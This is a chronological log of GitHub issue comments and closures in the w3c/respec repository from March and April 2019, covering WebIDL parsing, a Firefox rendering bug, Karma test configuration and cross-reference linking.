The second one works because neither of `[\w\s&;<>]` includes `|`, but `.+` will match `|`, causing over-matching.

[2019-03-31 11:24] Swapnilr1 commented on #2208
Yes, l understood why the first one overmatches, but that was only after I found a case where it overmatches. Specifying allowed characters is a safe approach.
Does `[\w\s&;<>]` cover all allowed characters? I have encountered `&;<>` for the first time as valid characters in variable types :open_mouth: so I don't have much of an idea on what is allowed and what is not.

[2019-04-01 09:49] marcoscaceres commented on #444
Sure, but only after the other PRs have been merged.

[2019-04-01 12:37] #1443 closed

[2019-04-02 00:59] algobot76 commented on #2182
@marcoscaceres Can I work on this issue?

[2019-04-02 03:46] marcoscaceres commented on #2208
@Swapnilr1 here is a comprehensive list of types:
https://heycam.github.io/webidl/#idl-types

See the more complex ones, like union, annotated, etc...

[2019-04-02 03:47] marcoscaceres commented on #2208
(note we don't need to process the types yet... we will do that eventually).

[2019-04-02 08:46] #2208 closed

[2019-04-02 09:11] sidvishnoi commented on #2184
Closed via https://github.com/w3c/respec/pull/2221

[2019-04-02 09:11] #2184 closed

[2019-04-02 10:07] Swapnilr1 commented on #2184
@sidvishnoi Well I don't think #2221 fully solves this, at least as per the discussion related to getting AST from WebIDL2 module.

[2019-04-02 10:51] saschanaz commented on #2184
We can open a new issue 😀

[2019-04-02 13:00] marcoscaceres opened #2223 "Move priv-sec linter rule to core"
The Geonovum folks want to use this module too, so we should make it a core module.

[2019-04-02 14:06] Swapnilr1 opened #2224 "Improper display of offending references in Firefox"
## Important info

* ReSpec version: 24.8.0
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

During testing, I got a normative reference in an informative section which rendered like this
![offendingelement](https://user-images.githubusercontent.com/35957512/55408511-bce66700-557d-11e9-991a-f94bcac9a303.png)

But what I was expecting?:
The word `BARRRR` to be in sin

[2019-04-02 15:57] sidvishnoi commented on #2224
Can you share the HTML that caused this?

[2019-04-02 16:11] Swapnilr1 commented on #2224
Just add `<p>A normative reference in informative section [[!payment-request]] and is illegal.
        But we keep it as normative and emit a warning.</p>`
in `basic.html` after Line 54 (https://github.com/w3c/respec/blob/develop/examples/basic.html#L54).

Basically enforcing normative reference in any informative section will do.

[2019-04-02 16:14] marcoscaceres commented on #2224
So weird... I'd like to leave `display: inline-block` if possible... but we should figure out why it's doing the crazy rendering. I've never seen that. Can you check in multiple browsers?

[2019-04-02 16:15] Swapnilr1 commented on #2224
Sorry, my bad, I should have mentioned this occurs in Firefox. Just checked in Chrome worked fine.

[2019-04-02 16:19] marcoscaceres commented on #2224
Ok, reproduced... the bug is that base.css sets `a[href]` to `margin: 0 -1px 0;` for some reason. What might fix it is to set `margin: 0;` on respec-offending-element.

[2019-04-02 16:19] marcoscaceres commented on #2224
sorry, just on `a[href].respec-offending-element`.

[2019-04-02 16:24] marcoscaceres commented on #2224
I should file a web compatibility bug on Firefox... Chrome and Safari render this properly.

[2019-04-02 16:25] sidvishnoi commented on #2224
For the node, Edge also renders properly.

[2019-04-02 16:31] Swapnilr1 commented on #2224
Thanks @sidvishnoi.
This is really strange - I never thought it could be a bug in Firefox.

[2019-04-02 16:34] sidvishnoi commented on #2224
@marcoscaceres minimal example: https://codepen.io/sidvishnoi/pen/BENGNR

[2019-04-02 16:43] marcoscaceres commented on #2224
Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1541102

[2019-04-02 16:46] marcoscaceres commented on #2224
Thanks - added the reduced test case to the Firefox bug.

[2019-04-02 16:49] Swapnilr1 commented on #2224
Should we patch this by setting `a[href].respec-offending-element { margin: 0;}` ?
This will fix it in Firefox, and Chrome is unaffected by setting margin to 0.

[2019-04-02 16:51] marcoscaceres commented on #2224
I've filed a bug on the W3C to remove the -1: https://github.com/w3c/tr-design/pull/176

@Swapnilr1 yes, your suggestion should work (it think). Please confirm.

[2019-04-02 18:17] Swapnilr1 commented on #2224
Setting margin to 0 for `.respec-offending-element a[href]` fixes the issue in Firefox, and in Chrome causes no changes.
We can add this as CSS in some module, though I don't know which one would be most suitable. But now that you have opened `https://github.com/w3c/tr-design/pull/176` do we need to patch it?

[2019-04-02 18:36] marcoscaceres commented on #2224
Whichever file currently defines respec-offendng-element. I think that's respec2.css?

[2019-04-02 19:01] marcoscaceres commented on #2224
Just to be clear, we should temporarily patch it... and then remove our patch once w3c/tr-design#176 gets fixed.

[2019-04-02 19:32] #2224 closed

[2019-04-02 21:12] marcoscaceres commented on #2224
Oh wow, it was a known issue from 5 months ago: https://bugzilla.mozilla.org/show_bug.cgi?id=1502610

[2019-04-02 23:46] #2207 closed

[2019-04-02 23:49] marcoscaceres commented on #2207
@AmeliaBR, shipped the fix in ReSpec 24.9.1. Let us know if its working for you.

[2019-04-03 05:51] Swapnilr1 commented on #2224
Strange nobody filed a bug here when the issue was discovered in a ReSpec built specification.

[2019-04-03 07:00] #2211 closed

[2019-04-03 08:33] saschanaz commented on #1955
Pinging @Swapnilr1, are you still working on this? I found this would be helpful for my other branch.

[2019-04-03 08:50] Swapnilr1 commented on #1955
@saschanaz Yeah I am working. Sorry didn't realise this was urgent, if I am not able to send in a PR tomorrow, you can do it if it's blocking something you are working on.

[2019-04-03 09:11] saschanaz commented on #1955
It’s not strictly blocking so no need to be sorry! Just wanted to be sure this is in progress 😁

________________________________
From: Swapnil Rustagi <notifications@github.com>
Sent: Wednesday, April 3, 2019 5:50:57 PM
To: w3c/respec
Cc: Kagami Sascha Rosylight; Mention
Subject: Re: [w3c/respec] Refactor biblio-db with idb dependency (#1955)

@saschanaz<https://nam04.safelinks.protection.outlook

[2019-04-03 17:49] devanshbatra04 opened #2227 "Respec2HTML randomly fails to show warnings when using webpack build"
On running Respec2HTML on documents using the ```builds/respec-w3c-common.js```, Respec2HTML randomly fails to list ToC warnings. (See screenshot)

I am unsure if this has anything to do with #2057. I also suspect #2010 might be the cause instead. FWIW, this does not happen on using RequireJS with ```profile-w3c-common```. I will look into this as its blocking #2205
![Screenshot from 2019-04-03 23

[2019-04-03 18:53] marcoscaceres commented on #2227
@devanshbatra04 can you try it with a local server? i.e., http://localhost:5000/tests/respec2html/ interested to see if it's related to that.

[2019-04-03 19:14] devanshbatra04 commented on #2227
Yes. Same thing. I actually encountered this on the server first, while working on #2205
I am positive it's a fixup.js issue

[2019-04-03 19:21] marcoscaceres commented on #2227
Maybe https://github.com/w3c/respec/issues/2010 ...

[2019-04-03 19:22] devanshbatra04 commented on #2227
Yes. Same thoughts. I wasn't sure though, so avoided commenting over there.
Will give it a more in-depth look in an hour or two.

[2019-04-03 22:41] ThobyV commented on #2030
Is there a person working on this issue please?

[2019-04-03 22:59] marcoscaceres commented on #2030
It’s all yours @ThobyV

[2019-04-04 01:16] saschanaz commented on #2227
This is indeed #2010. The fixup.js includes this line:

[code]

[2019-04-04 06:23] devanshbatra04 commented on #2227
I guess I will use another set of warnings in the PR in this case so this is no longer a blocker.

[2019-04-04 06:39] saschanaz commented on #2010
My current thought: Do #2187 first. It will run `respec2html` without actually executing the fixup, so a deterministic result.

[2019-04-04 07:30] elharony commented on #631
Hi @marcoscaceres ,

I would like to contribute and help fixing this issue, as it's marked as <kbd>[Good First Issue](https://github.com/w3c/respec/labels/good%20first%20issue)</kbd> but it doesn't seem to be so. Am I right? Please provide some guidelines here! 🙏

[2019-04-04 09:09] Swapnilr1 commented on #1955
@saschanaz I have not been able to resolve issues with tests. So I need guidance on that and this might take some time to get completed. I hope it is OK.

[2019-04-04 09:44] saschanaz commented on #1955
Try open a draft PR so that others can see what the problem would be. Maybe @sidvishnoi can help?

________________________________
From: Swapnil Rustagi <notifications@github.com>
Sent: Thursday, April 4, 2019 6:09:37 PM
To: w3c/respec
Cc: Kagami Sascha Rosylight; Mention
Subject: Re: [w3c/respec] Refactor biblio-db with idb dependency (#1955)

@saschanaz<https://eur04.safelinks.protection.outloo

[2019-04-04 09:48] Swapnilr1 commented on #1955
I have opened #2228. Thanks for the suggestion, I will ping sidvishnoi

[2019-04-05 08:50] andrea-perego commented on #2113
@markasoftware , @marcoscaceres , thanks for this fix!

Just an editorial consideration:

The ORCID is now showing up after the affiliation, and before the extra fields. Since the ORCID is an information specific to the editor/contributor (as the `url` field), it may be more appropriate to include it just after the name (i.e., before the affiliation).

[2019-04-06 01:34] markasoftware commented on #1642
It seems that triggering pseudoclasses from JS is impossible by design. The most reasonable way to test this, then, would probably be to add another class to https://github.com/w3c/respec/blob/24bf82b40e2e2ccb9efccc04390264b25252db77/assets/caniuse.css#L105 which is only used for testing. The test would call `firefoxButton.classList.add('whatever')` instead of `firefoxButton.focus()`. Personally,

[2019-04-06 15:07] devanshbatra04 commented on #2161
Just wanted some clarification. Are you referring to the requireJS usage [here](https://github.com/w3c/respec/blob/develop/tests/spec/core/pubsubhub-spec.html#L21)? Because pubsubhub-spec.html uses ```builds/respec-w3c-common.js``` (which as far as I can tell is the webpack build).
However this Require function comes from [core/expose-modules](https://github.com/w3c/respec/blob/develop/src/core/ex

[2019-04-06 15:22] saschanaz commented on #2161
I think you understand correctly. I think some other tests also had problems but I might be wrong.

[2019-04-06 16:06] devanshbatra04 commented on #2161
WebIDL spec does have this problem. trying to come up with a solution.

[2019-04-06 17:14] marcoscaceres commented on #1642
Agree, not worth testing.

[2019-04-06 17:14] #1642 closed

[2019-04-06 17:18] sidvishnoi commented on #1642
I found a _fun_ thing related to focus though. When the tab loses focus, `button.focus()` starts working 🤷‍♂️
Have a look https://streamable.com/f5lnc

[2019-04-06 17:41] markasoftware commented on #1642
To add to @sidvishnoi 's little discovery, it's actually even simpler: Running `button.focus()` in devtools then clicking anywhere on the spec page will open the dropdown! It seems that `focus()` actually can trigger the `:focus` pseudoclass (at least in Firefox), but the page must have focus too. This is probably the problem preventing it from working in tests: The frame containing the tests is n

[2019-04-06 18:08] marcoscaceres commented on #1642
I think to test this stuff properly we would need puppeteer.

[2019-04-06 20:37] markasoftware commented on #2182
I am fixing several issues with core/contrib.js while working on this -- would it be appropriate to output each contributor/commenter as a link to that person's profile instead of just their username? What about an attribute on the `gh-commenters` or `gh-contributors` element that controls whether it's a link?

[2019-04-06 21:39] devanshbatra04 commented on #2182
@markasoftware I really don't understand why would you need the full URL or conflict with the ReSpec file path.
You probably already figured this out but ReSpec hosts a local server with your ReSpec directory which you can trigger using npm start, typically on port 5000. This makes the location of ReSpec directory on your system irrelevant.
This means that if you visit [http://localhost:5000/examp

[2019-04-06 21:54] markasoftware commented on #2182
Thanks for the writeup @devanshbatra04

Wow, I must have completely spaced out to forget that there was a server running there. But, if I understand right, port 5000 is only used with `npm start`/the development server. When running tests with Karma, a different port is used. While I see now that you could hardcode that port (9876, I think) into the mock data, it would become very fragile -- provi

[2019-04-06 22:11] devanshbatra04 commented on #2182
Karma creates a separate server for running the tests.
The tests do run the development server as well without you explicitly running npm start for serving all the dependencies, build files and the mocks. These are two different servers for different usages. You don't need to worry about the Karma's test runner server (the 9876 one) at all.

Look at it this way. As of now, ```githubAPI = api.githu

[2019-04-06 22:21] markasoftware commented on #2182
The tests do run the development server as well without you explicitly running npm start for serving all the dependencies, build files and the mocks. These are two different servers for different usages. You don't need to worry about the Karma's test runner server (the 9876 one) at all.

I don't believe this is correct. `npm run test:karma` on my machine doesn't do anything on port 5000. All test

[2019-04-06 22:27] devanshbatra04 commented on #2182
My bad, you are right here. That's why we use window.location.origin in specs like these at [issues-notes-spec](https://github.com/w3c/respec/blob/d72aeb6fd5f2afbf152c421b3153e9c4d172df7c/tests/spec/core/issues-notes-spec.js#L135)
I also see your point now, the mock json will have a hardcoded URL.

[2019-04-07 02:48] #2113 closed

[2019-04-07 14:19] devanshbatra04 commented on #2161
I worked on this for several hours today.The issue encountered is only in ```core/webidl.html``` as of now.
I think I know exactly what is happening.
When we fetch the dfn element form [definiton map here](https://github.com/w3c/respec/blob/develop/src/core/link-to-dfn.js#L103), In test environment with webpack build, we get an object that is identical to the dfn element originally pushed here.

H

[2019-04-07 14:21] devanshbatra04 commented on #2161
This doesn't happen on running the HTML file in browser where the Map stores the actual HTMLElements. This is probably a bug.

[2019-04-08 00:36] saschanaz opened #2235 "Enable webidl2.js validator"
We will probably want to support multi-file validator input first, because otherwise we have to concatenate the input, ~~which will show confusing line numbers~~ which won't show which IDL block the problematic lines belongs to.

[2019-04-09 06:36] saschanaz commented on #2161
@devanshbatra04 That sounds bad, do you have an idea which exact line degrades them?

[2019-04-09 12:07] devanshbatra04 commented on #2161
It works totally fine in the ```dfn-map``` when I tried extracting the dfn htmlElement [here](https://github.com/w3c/respec/blob/develop/src/core/dfn-map.js#L14)

However, [this](https://github.com/w3c/respec/blob/753f0803ae81d8370cb9dc557af4126d968db44b/src/core/link-to-dfn.js#L14) is where it gets messed up. And addID function [here](https://github.com/w3c/respec/blob/753f0803ae81d8370cb9dc557af

[2019-04-09 12:22] saschanaz commented on #2161
When you try `document.contains(YOUR_EXTRACTED_ELEMENT)` what's the result?

[2019-04-09 23:32] andrea-perego opened #2243 "Making copyright configurable for non-W3C specs"
## Important info

* URL to affected spec: N/A
* ReSpec version: 24.10.2
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

_Apologies in advance if there's already a solution for this problem_.

If used for non-W3C specs, the only way I know to modify the copyright holder(s) is to use `overrideCopyright`.

This, however, has two main issues:
1. The content of the `ov

[2019-04-09 23:42] marcoscaceres commented on #2243
Duplicate of https://github.com/w3c/respec/issues/263

Unfortunately, there is no good way around this at the moment. @andrea-perego, that's a good suggestion. However, I'd like move away from relying on the config and instead use HTML for this... but we will need to think of some sane way of marking it up.

[2019-04-09 23:53] andrea-perego commented on #2243
Thanks, @marcoscaceres .

The HTML option (I guess using still `overrideCopyright`) would indeed be fine, but there should be a way to fix issue (2) above - i.e., not being obliged to hard-code the copyright start/end year.

[2019-04-09 23:56] marcoscaceres commented on #2243
Yeah, I was thinking something like some magic strings to replace:

[code]

[2019-04-10 00:22] marcoscaceres commented on #2243
better yet... some kind of web component. 🤔

[2019-04-10 04:42] #2223 closed

[2019-04-10 07:54] andrea-perego commented on #2243
@marcoscaceres , just came to my mind a possible shortcoming of the HTML option - namely, if copyright and licence are specified via an HTML-encoded text, they cannot be used in the JSON+LD snippet generated via param [doJsonLd](https://github.com/w3c/respec/wiki/doJsonLd).

[2019-04-10 07:57] marcoscaceres commented on #2243
Maybe we could extract the details from the HTML?

[2019-04-10 08:09] andrea-perego commented on #2243
Isn't it a bit error-prone?

[2019-04-10 08:12] marcoscaceres commented on #2243
I honestly don't know at this point... it depends how how we design the thing. I don't think it should be any more error prone than using JSON/config.

[2019-04-10 08:56] marcoscaceres opened #2244 "Deprecate SpecRunner.js"
We have two ways of running tests... SpecRunner and Karma... we should only have one: Karma.

We should look at removing SpecRunner.html and make sure any documentation that lists it gets updated too.

[2019-04-10 10:06] Swapnilr1 commented on #2244
I will do this.

[2019-04-11 04:41] sidvishnoi commented on #2179
I'm thinking if we should handle pluralization on server side. That way:
+ we won't have complicated logic at client
+ stronger search API, which can also be used in search interface
- extra data returned from server in some cases

[2019-04-11 07:32] Swapnilr1 commented on #2179
@sidvishnoi That's a good idea. I don't think there would be many cases where both the singular and plural forms are present in the specifications, so extra data being returned should be a rare issue.

[2019-04-11 12:34] #2244 closed

[2019-04-11 19:05] Swapnilr1 commented on #1035
Closed with https://github.com/w3c/respec/wiki/data-lt

[2019-04-11 19:05] #1035 closed

[2019-04-11 19:50] Swapnilr1 commented on #1592
A repo's wiki is also a git repository with all the markdown files (though it is not possible to view it as a repository on GitHub, only way to work with it is to clone it), so it is possible to add images there.

[2019-04-12 11:01] thijsbrentjens opened #2254 "Tests: karma doesn't run tests on Firefox 66.0.0 (Linux)"
## Important info
* URL to affected spec: n/a
* ReSpec version: current develop ()
* [x] I did a "hard refresh", but it's still busted.
* browser: Firefox 66.0.0 (Ubuntu)

## Description of problem
Running tests using:
[code]
Does open a browser window, but does not start to run tests.
The console gives an exception for test-main.js:
[code]

Note that tests do run with Chromium:
[code]

[2019-04-12 14:20] Swapnilr1 commented on #2254
This is because Firefox 66 does not support dynamic imports by default. They can be enabled by toggling `javascript.options.dynamicImport` in `about:config`. Though right now I have to toggle this option each time I run karma tests.
Firefox 67 will probably enable it by default (as far as I know it's enabled in the Beta builds), fixing the issue.

[2019-04-13 07:00] #2030 closed

[2019-04-13 14:25] sidvishnoi commented on #2179
Server side implementation: https://github.com/sidvishnoi/respec-xref-route/pull/26/

[2019-04-13 14:58] marcoscaceres commented on #2124
Proposals are in, so closing.

[2019-04-13 14:58] #2124 closed

[2019-04-13 21:50] marcoscaceres opened #2258 "Overmatching on enum values when two are on the same line"
## Description of problem
Given:
[code]

It overmatches and gets a syntax error.

[2019-04-13 21:57] marcoscaceres opened #2259 "Incorrect rendering of inline enum types"
Given:

[code]

It's getting rendered as `WakeLockType["system]"`

![Screen Shot 2019-04-14 at 7 56 54 AM](https://user-images.githubusercontent.com/870154/56085700-e612cb80-5e8a-11e9-8411-27d41cf5396e.png)

[2019-04-13 22:00] marcoscaceres commented on #2258
Same for:

[code]

[2019-04-13 22:04] marcoscaceres opened #2260 "Inline parser syntax errors not presented to user"
## Description of problem
If the inline syntax error is detected, it's currently being channeled to console.error, but not shown to the user.

Additionally, it's chopping off parts of what it was unable to parse:

<img width="953" alt="Screen Shot 2019-04-14 at 8 03 29 AM" src="https://user-images.githubusercontent.com/870154/56085748-d051d600-5e8b-11e9-8ee9-7c1787ba7f90.png">

But what I was expe

[2019-04-14 08:19] #2258 closed

[2019-04-14 09:05] #2259 closed

[2019-04-14 09:31] #2260 closed

[2019-04-14 10:02] marcoscaceres commented on #1520
Fixed via #2261

[2019-04-14 10:02] #1520 closed

[2019-04-14 11:55] sidvishnoi commented on #2179
Closed via sidvishnoi/respec-xref-route#26

[2019-04-14 11:55] #2179 closed

[2019-04-14 22:05] marcoscaceres opened #2270 "Better error message for ambiguous terms"
The current error message for in-spec ambiguous term is somewhat misleading:

It should be:

[2019-04-14 23:03] marcoscaceres opened #2271 "Let definitions in specs be "for" particular things"
For WebIDL, we have the ability to say that the definition of `attribute X` is for `SomeInterface`. It would be nice to be able to expand this concept globally so that:

 * A definition can be for a particular thing (e.g., "sort" is for "list").
 * A internal slot is for an interface. (e.g., we can then have: [[request]] is for PaymentRequest, [[request]] is for PaymentResponse and a way to define

[2019-04-14 23:30] marcoscaceres opened #2272 "Definitions should include a self link"
Likke in the WebIDL spec:

https://heycam.github.io/webidl/#aborterror

It is shown on hover.

![Screen Shot 2019-04-15 at 9 29 28 AM](https://user-images.githubusercontent.com/870154/56100852-22b0f680-5f61-11e9-8edd-7073cea5a9e4.png)

[2019-04-15 01:50] marcoscaceres commented on #2254
@thijsbrentjens, we just added something that should help. You can now do:

[code]

That will automatically enable dynamic imports, and makes sure the profile gets generated in a debuggable way.

You can also add `export BROWSERS=FirefoxPref` to your .bashrc or .szshrc (depending on what you use).

[2019-04-15 01:51] marcoscaceres commented on #2254
Just noting, having to build the profile before testing is a temporary thing... once we have Webpack in place, that bit of pain will go away.

[2019-04-15 02:04] marcoscaceres opened #2274 ""Can I use this API" doesn't apply everywhere"
Can I use shows "Can I Use this API?" in the header. However, not all specs are APIs... So maybe we should say:

 * Can I use this feature?

or

 * Browser support:

Other suggestions?

[2019-04-15 03:54] marcoscaceres commented on #1975
Did a little more experimenting... I think we should do this:

 1. create `📂 profiles` folder.
 1. profiles are called, for example, w3c.js.
 1. create a dynamic Webpack config:

[code]

## Profile structure

[code]

We modify base-runner to import() plugins.

### What about CSS, SVG?
For most modules, the CSS is small... let's just inline it or properly CSS-in-JS it.

[2019-04-15 04:55] saschanaz commented on #1975
Webpack can track the dependencies only in `import("...path...")` but not in `var path; import (path);` format, so probably we should do:

[code]

[2019-04-15 04:57] marcoscaceres commented on #1975
Another option is:

[code]

[2019-04-15 04:58] saschanaz commented on #2254
I don't understand, we should still run webpack before the test?

[2019-04-15 04:59] sidvishnoi commented on #2274
+1 for "Browser support"

[2019-04-15 04:59] saschanaz commented on #1975
That would double the lines and we have to manually name all the `run`s, so personally I don't think it's preferable.

[2019-04-15 05:11] marcoscaceres commented on #2254
Sure, but with Webpack dev server running, it's constantly building in the background... so it just works TM. Right now, we have to remember to rebuild every time... which I often forget so end up spinning up Karma, having to shut it down, etc..

[2019-04-15 05:53] marcoscaceres opened #2276 "Try enabling Firefox on travis again.."
A about a year has passed since we last tried this... might be fun to try Firefox again, now that it has a headless mode. Would have caught #2275

[2019-04-15 07:52] #2276 closed

[2019-04-16 16:10] sidvishnoi opened #2283 "self-link doesn't link to correct id"
## Important info

* URL to affected spec: https://w3c.github.io/payment-request/
* ReSpec version: 24.16.1
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

Clicked "Changes since last publication" heading under SOTD, which linked to `#sotd` instead of `#changes-since-last-publication`

[2019-04-16 16:12] marcoscaceres commented on #2283
Yeah, no idea what happened there. I spotted that too :(

[2019-04-16 16:20] marcoscaceres commented on #1975
Agree. Just mapping out all the options.

[2019-04-17 03:26] marcoscaceres commented on #2274
Yeah, I agree... it would fit most nicely with the other things listed.

[2019-04-17 12:14] yuanchuan commented on #2283
Somehow the `id` has not been generated.

According to the source code, the section with the class name `.introductory` will be skipped to be traversed along with all its child sections:

https://github.com/w3c/respec/blob/a624099f4a32e87f8cbdf359bb801d513018df7f/src/core/structure.js#L108

While the `sotd` section always contains a `.introductory` class name:

https://github.com/w3c/respec/blob/a

[2019-04-18 05:11] marcoscaceres commented on #2283
@yuanchuan, thanks for investigating... what it is doing partially correct, but an id should be assigned irrespective of it being in an `.introductory` section.

[2019-04-18 18:08] sidvishnoi opened #2288 "xref linking fails in Firefox private window"
## Important info

* URL to affected spec: https://w3c.github.io/payment-request/
* ReSpec version: 24.17.0
* [x] I did a "hard refresh", but it's still busted.

Firefox doesn't allow to use IDB in private window, so xref linking breaks as stuff just throws (`"A mutation operation was attempted on a database that did not allow mutations."`). We should catch that error and fetch from network direct

[2019-04-19 04:21] saschanaz opened #2289 "kjhtml disables karma grep option"
`npm run karma -- --browsers ChromeHeadless --grep WebIDL` is expected to only run WebIDL tests but `kjhtml` somehow disables this. Removing `kjhtml` from `karma.conf.js` fixes the issue.

Relevant issue: https://github.com/dfederm/karma-jasmine-html-reporter/issues/23

[2019-04-19 10:27] #2283 closed

[2019-04-19 10:51] #2288 closed

[2019-04-19 11:04] marcoscaceres commented on #2254
closing as answered.

[2019-04-19 11:04] #2254 closed

[2019-04-19 11:32] #2274 closed

[2019-04-19 12:16] #2270 closed

[2019-04-19 13:42] #1635 closed

[2019-04-19 15:23] marcoscaceres commented on #1052
Closing, as contextual citations handler this.

[2019-04-19 15:23] #1052 closed

[2019-04-19 15:25] marcoscaceres commented on #886
Closing as wont fix.

[2019-04-19 15:25] #886 closed

[2019-04-19 15:28] marcoscaceres commented on #1124
Examples are now linkable, so closing.

[2019-04-19 15:49] marcoscaceres commented on #748
We’ve removed what we can from ReSpec’s style sheet.

[2019-04-19 15:49] #748 closed

[2019-04-20 13:26] marcoscaceres opened #2297 "var highlight overmatches"
Given:

[code]

The second |varA| shouldn't be highlighted, because it's in a new sub section.

[2019-04-20 14:12] andrea-perego commented on #1124
@marcoscaceres , how this could be done? I tried on a local copy of a ReSpec document, adding `<a href="#[exampled-id]"></a>`, but it does not work.

[2019-04-20 14:16] marcoscaceres commented on #1124
Oh, my bad, I misunderstood. I thought this was about making examples linkable.

[2019-04-21 13:32] saschanaz commented on #2297
Meaning they are different variables? I suspect that would be confusing for readers...

[2019-04-21 13:55] marcoscaceres commented on #2297
Yes, they are different. Indeed, it’s confusing. I’ll try to send a fix tomorrow.

[2019-04-21 14:19] saschanaz commented on #2297
To be clear, I think readers may falsely consider they are same because of the name, even after the fix. What would be the use case here?

[2019-04-21 14:30] marcoscaceres commented on #2297
Ah, no. It’s pretty clear they are not. You can take a look at Payment Request API to see that clearly. There are visual cues in each section to indicate they are self-contained: for example, heading, algorithms contain lines and indenting, etc. When the overmatching on vars happens, it’s pretty clear there is some kind of bug.

[2019-04-21 14:32] marcoscaceres commented on #2297
(Sorry for lack of images and links to clearly show the problem - on my phone. Will post some tomorrow)

[2019-04-22 08:04] marcoscaceres commented on #2297
Example:

<img width="948" alt="Screenshot 2019-04-22 18 04 05" src="https://user-images.githubusercontent.com/870154/56490592-10b6f100-6529-11e9-8e33-4be1078aac46.png">

[2019-04-22 08:32] saschanaz commented on #2297
Ah, okay, explicit redeclaration.

[2019-04-22 08:43] saschanaz commented on #1804
#2175 added variable typing but not the auto-link thing, right?

[2019-04-22 08:45] marcoscaceres commented on #1804
Correct... need to do the auto linking part. I was unsure if we should just close this bug and start a new one.

[2019-04-22 08:45] saschanaz commented on #1804
Would be cleaner to start a new thread.

[2019-04-22 09:00] #1124 closed

[2019-04-22 09:01] #1804 closed

[2019-04-22 11:37] marcoscaceres commented on #1849
closing as answered.

[2019-04-22 11:37] #1849 closed

[2019-04-22 15:22] #2297 closed

[2019-04-23 09:56] sidvishnoi commented on #2272
Closing in favor of https://github.com/w3c/respec/issues/1103

[2019-04-23 09:56] #2272 closed

[2019-04-23 13:34] sidvishnoi commented on #1381
I'll be looking into using GitHub API v4 integration at respec.org this weekend.

[2019-04-23 15:34] marcoscaceres commented on #1508
Closing as duplicate of #1050.

[2019-04-23 15:34] #1508 closed

[2019-04-23 15:37] marcoscaceres commented on #2289
I’m still unsure if this is really a ReSpec bug?

[2019-04-23 15:41] marcoscaceres commented on #2212
@saschanaz do you think we can do anything here? Or “abandon all hope”?

[2019-04-23 15:49] marcoscaceres commented on #1996
Closing as answered: we keep shortcuts for now.

[2019-04-23 15:49] #1996 closed

[2019-04-23 22:32] saschanaz commented on #2289
Not strictly, but I needed to note this somewhere.

[2019-04-24 04:44] saschanaz commented on #2212
@marcoscaceres I think we should learn exactly what behavior differences exist, add some tests for it, and then we can revisit this. For now it's rather a black box...

[2019-04-24 05:06] marcoscaceres commented on #1669
Added privsec linter rule to docs.

[2019-04-24 05:06] #1669 closed

[2019-04-24 09:58] marcoscaceres commented on #2131
@r12a, I know you are not a huge fan of Lisp-like syntax, but as we were already using "[[[thing]]]" to expand citations, we've decided to just stick with that.

Once #2309 lands, you will be able to do [[[#fragment-id]]], and that will expand out:

 * examples
 * sections
 * figures

If ReSpec can't find what you are trying to reference, it will show a (hopefully helpful) error.

[2019-04-24 10:41] r12a commented on #2131
Thanks Marcos!  In principle, i would have preferred markup yes, but (if i understand correctly how it works) this should still meet the basic need, and may actually be easier to type for authors.  It will also be handy to have the error message. I'll try it out once it's landed.

[2019-04-24 13:46] marcoscaceres commented on #1858
Closed via #2110

[2019-04-24 13:46] #1858 closed

[2019-04-24 13:47] marcoscaceres commented on #1693
Closed via #2110

[2019-04-24 13:47] #1693 closed

[2019-04-24 14:21] marcoscaceres opened #2310 "clearer message for when data-cite stomps on a reference"
Given:

[code]

The second data-cite stomps on the first data-cite... so it would be nice if the error message made it more clear why DOMString is not found (in infra).

Alternative might be to walk up the tree, so first try infra, and then try WebIDL.

[2019-04-26 05:40] #2289 closed

[2019-04-26 07:24] saschanaz commented on #685
@marcoscaceres The link is broken, do you recall what this is?

[2019-04-26 08:44] sidvishnoi commented on #685
@saschanaz This maybe?
https://github.com/tabatkins/bikeshed/blob/10ff3eb4050069e20bb9b943c8b76fe5bfe3a48f/docs/index.bs#L2229

[2019-04-26 09:54] marcoscaceres commented on #685
Yep, that one.

[2019-04-27 00:32] saschanaz commented on #685
That again maps to: https://tabatkins.github.io/bikeshed/#dfn-contract

Thanks!

[2019-04-27 02:28] saschanaz commented on #685
We use `data-lt` and this item requires we use `lt` instead. Fixing Shepherd instead to support `data-lt` looks more reasonable here... (Or does Shepherd already support it?)

[2019-04-27 06:47] sidvishnoi commented on #685
@saschanaz Shepherd uses `data-lt` only. `lt` is probably Bikeshed's shorthand.
http://hg.csswg.org/dev/specification/file/821238a37a22/python/specification/specificationparser.py#l516

[2019-04-27 07:54] marcoscaceres opened #2313 "MDN pill hard to use on mobile"
The MDN boxes are a little difficult to use on mobile. We should increase hit area to the whole box, and we should open the whole thing up by default (i.e., let's get rid of details).

We should also improve the markup. When we shipped, we copied what the HTML Spec was doing... but the markup is less than ideal.

[2019-04-28 09:56] saschanaz commented on #685
That's good. What are the missing features here?

[2019-04-28 10:32] marcoscaceres commented on #685
We need to decide if we should automatically add “no-export” to non-IDL definitions, and export IDL things (along with data-* things that might be needed).

There are other subtle things we should do, like allowing IDL things to be “self defining” (in the IDL itself) instead of requiring things to be defined separately.

[2019-04-28 10:34] marcoscaceres commented on #685
To be clear, Editors should explicitly have to either export things or explicitly not export things. I think BikeShed defaults to exporting by default.

[2019-04-28 10:37] saschanaz commented on #685
Adding `data-export` for IDL things sounds easy enough.

[2019-04-28 11:35] saschanaz opened #2316 "Allow IDL types to be self-defined"
From https://github.com/w3c/respec/issues/685#issuecomment-487366561

[2019-04-29 01:59] marcoscaceres opened #2317 "Should inheritance take same path as name"
Given:

[code]

Right now, the WebIDL module has `inheritance()` handler path, but EventTarget really just another interface (name). @saschanaz, should that just take the "name()" template path instead? Right now, the code doesn't complain when the super class is not linked.

[2019-04-29 02:00] marcoscaceres commented on #2317
I've been playing around with changing inheritance to:

[code]

[2019-04-29 02:04] saschanaz commented on #2317
`inheritance()` is just a wrapper to add `.idlSuperclass`, the real linking thing happens on `reference()`.

[2019-04-29 02:18] saschanaz commented on #2317
Maybe we want to introduce strict-linking that warns whenever unknown reference happens? Right now [any unknown references are just ignored](https://w3c.github.io/performance-timeline/#the-performanceentry-interface). (Look at `DOMHighResTimeStamp`.)

[2019-04-29 03:04] marcoscaceres commented on #2317
Yeah, agree. We want strict linking on everything... `xref: true` can then deal with the broken links, because it knows how to easily find IDL. Another bonus is that the linking table in the IDL module goes away :)

[2019-04-29 03:06] marcoscaceres commented on #2317
